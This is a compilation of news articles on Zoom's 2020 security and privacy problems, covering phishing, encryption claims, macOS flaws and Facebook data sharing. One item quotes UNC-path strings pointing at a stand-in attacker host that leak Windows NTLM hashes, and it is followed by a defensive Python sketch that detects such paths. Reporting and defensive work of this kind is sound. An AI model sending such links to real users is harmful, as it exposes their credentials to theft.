  20. New phishing attack targets Zoom users to steal Office 365 credentials A new phishing attack is targeting Microsoft 365 (formerly Office 365) users in the form of an email notification for a Zoom account suspension. The email aims to steal users’ Microsoft 365 credentials. The attack was spotted and documented by Abnormal Security (via BleepingComputer). The attack seems similar to the one that was spotted in May, where a fake Teams email would navigate users to a duplicate Office 365 login page. With the popularity and adoption of Zoom increasing due to increased remote collaboration in the times of the pandemic, such account suspension emails spike users’ interest and warrant immediate attention. In this case, users mostly rush to correct the problem without any suspicion to avoid losing access to the tool that may hinder their work. The email for the Zoom suspension notification interestingly comes from an email address that spoofs the official domain, says the source. It mimics an automated email notification that links to a fake Microsoft 365 login page, prompting users to enter their Office 365 credentials. The credentials are then compromised by hackers. The research firm adds that the phishing email has been served to more than 50,000 users. One sign that points to the illegitimacy of the email is the “zoom” branding in the email body without the capitalization of the first letter. Even if users click on the ‘Activate Account’ link in the email, the ‘Outlook’ logo or the domain of the Office 365 login page are telltale signs. The stolen credentials could be used in Business Email Compromise (BEC) scams that exploit cloud email services like Microsoft 365 and Google G Suite. New phishing attack targets Zoom users to steal Office 365 credentials
  21. Zoom isn’t actually end-to-end encrypted Zoom can still access your video meetings Zoom states on its website and in its security white paper that it supports end-to-end encryption for its meetings. But new research from The Intercept reveals that’s not exactly true. The Intercept asked a Zoom spokesperson whether video meetings that take place on the platform are end-to-end encrypted, and the spokesperson said that “Currently, it is not possible to enable E2E encryption for Zoom video meetings.” Zoom does use TLS encryption, the same standard that web browsers use to secure HTTPS websites. In practice, that means that data is encrypted between you and Zoom’s servers, similar to Gmail or Facebook content. But the term end-to-end encryption typically refers to protecting content between the users entirely with no company access at all, similar to Signal or WhatsApp. Zoom does not offer that level of encryption, making the use of “end-to-end” highly misleading. Zoom, however, denies that it’s misleading users. The company told The Intercept, “When we use the phrase ‘End to End’ in our other literature, it is in reference to the connection being encrypted from Zoom end point to Zoom end point,” and that “content is not decrypted as it transfers across the Zoom cloud.” Zoom’s in-meeting text chat does appear to support E2E; Zoom said it does not have the keys to decrypt those messages. Zoom also told The Intercept that it only collects user data that it needs to improve its service, including IP addresses, OS details, and device details, and doesn’t allow employees to access the specific content of meetings. It also said that it doesn’t sell user data of any kind. However, it’s possible that the company could be compelled to hand over meeting recordings for legal proceedings. Zoom did not respond to a request for comment. Source: Zoom isn’t actually end-to-end encrypted (The Verge)
  22. Zoom to fix security and privacy issues in 90-day feature freeze Zoom, which has come under a lot of backlash recently due to privacy and security issues, announced today that the video conferencing company is enacting a feature freeze for the next 90 days. In a blog post, CEO Eric S. Yuan stated that until the current feature set is fixed, the company won't be rolling out any new features. Moreover, in collaboration with third-party experts, it will prepare a transparency report. Yuan also revealed that the number of daily users has increased from 10 million in December to 200 million daily users, both free and paid, in March. While stating that Zoom was primarily built for enterprise customers, he explained that the company had not foreseen this massive surge in users before the coronavirus pandemic. "However, we did not design the product with the foresight that, in a matter of weeks, every person in the world would suddenly be working, studying, and socializing from home. We now have a much broader set of users who are utilizing our product in a myriad of unexpected ways, presenting us with challenges we did not anticipate when the platform was conceived." Zoom is also "enhancing" its bug bounty program. In addition to consulting with leading chief information security officials in the industry, it will be using white-box penetration testing to identify and fix loopholes in the system. Starting next week, Yuan will host a weekly webinar on Wednesdays at 10 am PT, detailing privacy and security updates for Zoom, for the next 90 days. In a recent memo sent to staff, SpaceX prohibited employees from using Zoom effective immediately, citing "significant privacy and security concerns." Source: Zoom to fix security and privacy issues in 90-day feature freeze (Neowin)
  23. The Zoom Privacy Backlash Is Only Getting Started A class action lawsuit. Rampant zoombombing. And as of today, two new zero-day vulnerabilities. The popular video conferencing application Zoom has been having A Moment during the Covid-19 pandemic. But it's not all positive. As many people's professional and social lives move completely online, Zoom use has exploded. But with this boom has come added scrutiny from security and privacy researchers—and they keep finding more problems, including two fresh zero day vulnerabilities revealed Wednesday morning. The debate has underscored the inherent tension of balancing mainstream needs with robust security. Go too far in either direction, and valid criticism awaits. "Zoom has never been known as the most hardcore secure and private service, and there have certainly been some critical vulnerabilities, but in many cases there aren't a lot of other options," says security researcher Kenn White. "It's absolutely fair to put public pressure on Zoom to make things safer for regular users. But I wouldn't tell people 'don't use Zoom.' It's like everyone is driving a 1989 Geo and security folks are worrying about the air flow in a Ferrari." Zoom isn't the only video conferencing option, but displaced businesses, schools, and organizations have coalesced around it amid widespread shelter in place orders. It's free to use, has an intuitive interface, and can accommodate group video chats for up to 100 people. There's a lot to like. By contrast, Skype's group video chat feature only supports 50 participants for free, and live streaming options like Facebook Live don't have the immediacy and interactivity of putting everyone in a digital room together. Google offers multiple video chat options—maybe too many, if you're looking for one simple solution. 
At the same time, recent findings about Zoom's security and privacy failings have been legitimately concerning. Zoom's iOS app was quietly—and the company says accidentally—sending data to Facebook without notifying users, even if they had no Facebook account. The service pushed a fix late last week. Zoom also updated its privacy policy over the weekend after a report revealed that the old terms would have allowed the company to collect user information, including meeting content, and analyze it for targeted advertising or other marketing. And users have been creeped out by Zoom's attention tracking-feature, which lets the meeting host know if an attendee hasn't had the Zoom window in their screen's foreground for 30 seconds. During the pandemic, a type of online abuse known as Zoombombing, in which trolls abuse Zoom's default screen-sharing settings to take over meetings—often with racist messages or pornography—has also spiked. Zoom offers tools to protect against that sort of assault, specifically the option to password-protect your meeting, add a waiting room for pre-vetting attendees, and limit screen-sharing. Some paid and free speciality versions of the service, like Zoom for Education, also have different screen sharing defaults. But in general the service doesn't highlight these options in a way that would make them intuitive to enable. "It's as though, in suddenly shifting from the office to work from home, we didn't so much move the conference room into our kitchens as into the middle of the public square," says Riana Pfefferkorn, associate director of surveillance and cybersecurity at Stanford's Center for Internet and Society. "Enterprise platforms are now seeing the same abuse problems that we've long been used to seeing on Twitter, YouTube, Reddit, etc. Those platforms were inherently designed to let strangers contact other strangers—and yet they had to tack on anti-abuse features after-the-fact, too." 
Perhaps most jarring of all, the service has a security feature that it falsely described as being "end-to-end encrypted." Turning on the setting does strengthen the encryption on your video calls, but does not afford them the protection of being completely encrypted at all times in transit. Achieving full end-to-end encryption in group video calling is difficult; Apple memorably spent years finding a way to implement it for FaceTime. And for a service that can support so many streams on each call, it was always unlikely that Zoom had actually achieved this protection, despite its marketing claims. Zoom did not return a request for comment from WIRED about how it is handling this deluge of security and privacy findings in its product. All of this compounds with the fact that even before the pandemic, Zoom had a reputation for prioritizing ease of use over security and privacy. Notably, a researcher revealed flaws last summer about how Zoom seamlessly joined users into call links and shared their camera feeds without an initial check to let users confirm they wanted to launch the app. That means attackers could have crafted Zoom links that instantly gave them access to a user's video feed—and everything going on around them—with one click. The research also built on previous Zoom vulnerability findings. Zoom's gaffes have also started to invite even more potentially consequential scrutiny. The company is facing a class action lawsuit over the data its iOS app sent to Facebook. And the office of New York attorney general Letitia James sent a letter to the company on Monday about its mounting punch list. "While Zoom has remediated specific reported security vulnerabilities, we would like to understand whether Zoom has undertaken a broader review of its security practices," the attorney general's office wrote. 
Given this track record and all the commotion about Zoom security in the last few weeks, macOS security researcher Patrick Wardle says he recently got interested in poking at the Mac desktop Zoom app. Today he is disclosing two new security flaws he found during that brief analysis. "Zoom, while great from a usability point of view, clearly hasn’t been designed with security in mind," Wardle says. "I saw some researchers tweeting about strange Zoom behavior and literally within 10 seconds of looking at it myself I was just like aw, man. Granted I research this stuff, so I know what to look for. But Zoom has just had so many missteps, and that’s very indicative of a product that has not been adequately audited from a security point of view." Wardle's findings pose limited risk to users in practice, because they would first require the presence of malware on a target device. One attack focuses on a Zoom installation flow that still relies on a now-retired application programming interface from Apple. The company deprecated the API because of security concerns, but Wardle says that he sometimes still sees products using it as a lazy workaround. An attacker who has infected a victim device with malware, but hasn't yet achieved full access, could exploit Zoom's insecure install settings to gain root privileges. The other vulnerability Wardle found is more significant, though still only a local access bug. macOS offers a feature called "hardened runtime" that lets the operating system act as a sort of bouncer while programs are running and prevent code injections or other manipulations that are typically malicious. Developers can choose to add exemptions for third-party plugins if they want to have that additional functionality from an external source, but Wardle notes that such exceptions are typically a last resort, because they undermine the whole premise of "hardened runtime." 
Yet Zoom's macOS application has such an exemption for third-party libraries, meaning malware running on a victim's system could inject code into Zoom that's trusted and essentially link the two applications—allowing the malware to piggyback on Zoom's legitimate microphone and video access and start listening in on a victim or watching through their webcam whenever the malware wants. Though it doesn't look like researchers will stop finding flaws in Zoom any time soon, the most important takeaway for regular users is simply to think carefully about their security and privacy needs for each call they make. Zoom's security is likely sufficient for most people's general communications, but there are more protected group video chat options—like those offered by WhatsApp, FaceTime, and particularly Signal—that could be a better fit for sensitive gatherings. "The reality is that companies are going to have mistakes in their software," says Jonathan Leitschuh, a security researcher who found the webcam hijacking flaws in Zoom last summer. "The more criticism of a platform, the more secure it’s hopefully going to be. So hopefully Zoom is taking the information that they’re gaining and actually acting on it. But if you need to be secure and secret I would not recommend you have those conversations over Zoom. Use a platform that’s built for the level of security you need." Source: The Zoom Privacy Backlash Is Only Getting Started (Wired)
  24. Attackers can use Zoom to steal users’ Windows credentials with no warning

Zoom for Windows converts network locations into clickable links. What could go wrong?

Users of Zoom for Windows beware: the widely used software has a vulnerability that allows attackers to steal your operating system credentials, researchers said.

Discovery of the currently unpatched vulnerability comes as Zoom usage has soared in the wake of the coronavirus pandemic. With massive numbers of people working from home, they rely on Zoom to connect with co-workers, customers, and partners. Many of these home users are connecting to sensitive work networks through temporary or improvised means that don’t have the benefit of enterprise-grade firewalls found on-premises.

Embed network location here

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings—such as //attacker.example.com/C$—into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link. Attackers can then use the credentials to access shared network resources, such as Outlook servers and storage devices. Typically, resources on a Windows network will accept the NTLM hash when authenticating a device. That leaves the networks open to so-called pass-the-hash attacks that don’t require a cracking technique to convert the hash to its corresponding plain-text password.

“It’s quite a shortcoming from Zoom,” Matthew Hickey, cofounder of the security boutique Hacker House, told me. “It’s a very trivial bug. With more of us working from home now, it’s even easier to exploit that bug.”

The vulnerability was first described last week by a researcher who uses the Twitter handle @_g0dmode. He wrote: “#Zoom chat allows you to post links such as \\x.x.x.x\xyz to attempt to capture Net-NTLM hashes if clicked by other users.”

On Tuesday, Hickey expanded on the discovery. He showed in one tweet how the Zoom Windows client exposed the credentials that could be used to access restricted parts of a Windows network.

“Hi @zoom_us & @NCSC,” Hickey wrote. “Here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screen shot below shows an example UNC path link and the credentials being exposed (redacted).”

The screenshot shows the Windows username as Bluemoon/HackerFantastic. Immediately below, the NTLM hash appears, although Hickey redacted most of it in the image he posted.

Attacks can be mounted by people posing as a legitimate meeting participant or during so-called Zoom bombing raids, in which trolls access a meeting not secured by a password and bombard everyone else with offensive or harassing images.

Protect yourself

While the attack works only against Windows users, Hickey said attacks can be launched using any form of Zoom, again, by sending targets a UNC location in a text message. When Windows users click on the link while they’re connected to certain unsecured machines or networks, the Zoom app will send the credentials over port 445, which is used to transmit traffic related to Windows SMB and Active Directory services.

In the event that port 445 is closed to the Internet—either by a device or network firewall or through an ISP that blocks it—the attack won’t work. But it’s hardly a given that this egress will be closed on many Zoom users’ networks. The events of the past month have left millions of people working from home without the same levels of IT and security support they get when working on premises. That makes it more likely that port 445 is open, either because of an oversight or because the port is needed to connect to enterprise resources.

Zoom representatives didn’t respond to an email sent on Tuesday seeking comment for this post. This post will be updated if a reply comes later. In the meantime, Windows users should be highly suspicious of chat messages that contain links in them. When possible, users should also ensure that port 445 is either blocked or can access only trusted addresses on the Internet.

Source: Attackers can use Zoom to steal users’ Windows credentials with no warning (Ars Technica)
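A defensive sketch of the chat-rendering step described in item 24, added here as an example and not Zoom's code: only explicit http/https tokens become links, while UNC strings and non-web URL schemes such as `file://` stay inert text and are reported. The function names and sample messages are constructed, and treating forward-slash `//host/share` as UNC is a conservative assumption.

```python
import html
import re

TOKEN = re.compile(r"(\s+)")  # split on whitespace, keeping it for re-joining
# \\host, \\host\share or //host/share: matched in either slash direction
# (assumption: flag both, since only the rendering decision depends on it).
UNC = re.compile(r"^[\\/]{2}[^\\/\s]+([\\/]\S*)?$")
SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*)://")
ALLOWED_SCHEMES = {"http", "https"}


def classify(token):
    """Return 'link', 'unc', 'blocked-scheme' or 'text' for one chat token."""
    if UNC.match(token):
        return "unc"
    m = SCHEME.match(token)
    if m is None:
        return "text"
    # file://host/share reaches an SMB server just as a UNC path does,
    # so every scheme outside the allow-list is refused, not only file.
    return "link" if m.group(1).lower() in ALLOWED_SCHEMES else "blocked-scheme"


def render_chat(message):
    """Return (html, findings); only http/https tokens become anchors."""
    out, findings = [], []
    for part in TOKEN.split(message):
        kind = classify(part)
        safe = html.escape(part, quote=True)
        if kind == "link":
            out.append(f'<a href="{safe}" rel="noopener noreferrer">{safe}</a>')
        else:
            if kind != "text":
                findings.append((kind, part))  # surface to moderation/logging
            out.append(safe)
    return "".join(out), findings


if __name__ == "__main__":
    samples = [  # constructed chat messages
        r"notes are at \\x.x.x.x\xyz",
        "mirror: //attacker.example.com/C$",
        "slides: https://example.com/deck?id=1&p=2",
        "open file://attacker.example.com/share/a.docx",
    ]
    for s in samples:
        print(render_chat(s))
```

The allow-list is the important design choice: the renderer decides what may become a link, so a new path syntax fails closed as plain text.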
  25. Video calling app Zoom's iOS version is sharing user data with Facebook

Even if you don't have a Facebook account

Zoom's video calling service has been available for a while now but the unprecedented number of people working from home during the coronavirus pandemic has skyrocketed the app's popularity.

However, research conducted by Vice's tech branch, Motherboard, has revealed that Zoom's iOS app has been secretly sharing analytical data with Facebook, even if the user doesn't have an account on the social media platform. The data being shared includes time the app is launched, device and location information, phone carrier, and analytical data that can be used to create targeted ads.

Too much information

The reason Zoom is able to share user data with Facebook, even if there's no linked social media account, is because the video calling app uses Facebook's software development kits (SDKs). So, when Zoom is downloaded and launched, it immediately connects to the Facebook Graph API.

This is not a new practice: developers have long used Facebook SDKs to add features to their apps, although Facebook's terms of use require app makers to inform users of these data sharing practices.

While Zoom's privacy policy mentions that the app may collect data related to a user's Facebook profile which may then be shared with third parties – although Facebook is not explicitly mentioned as a third party – there's no clear indication it will be doing the same for users who do not have a Facebook account.

Not the first time

Zoom does have a history of privacy issues. In 2019, a security researcher unearthed a bug that allowed webcams of Zoom users to be hacked without their knowledge, although the company has said that the issue has been resolved.

Other recent news related to video chat security involves a man exposing himself in front of children on a video call after he was able to "guess" the link to the call. While this was not on a Zoom call (instead on an app called Whereby), TechCrunch reported last year that it was possible to hijack a Zoom meeting by "cycling through different permutations of meeting IDs in bulk". This was possible as the meetings weren't protected by a passcode.

The Electronic Frontier Foundation (EFF) recently explained how a host on a Zoom call can monitor the activities of participants while screen-sharing. If users record the video call, then Zoom administrators are able to "access the contents of that recorded call, including video, audio, transcript, and chat files, as well as access to sharing, analytics, and cloud management privileges".

While the old security issues have since been resolved by Zoom, this new discovery highlights how simple technological solutions can sometimes come at the cost of privacy.

Source: Video calling app Zoom's iOS version is sharing user data with Facebook (TechRadar)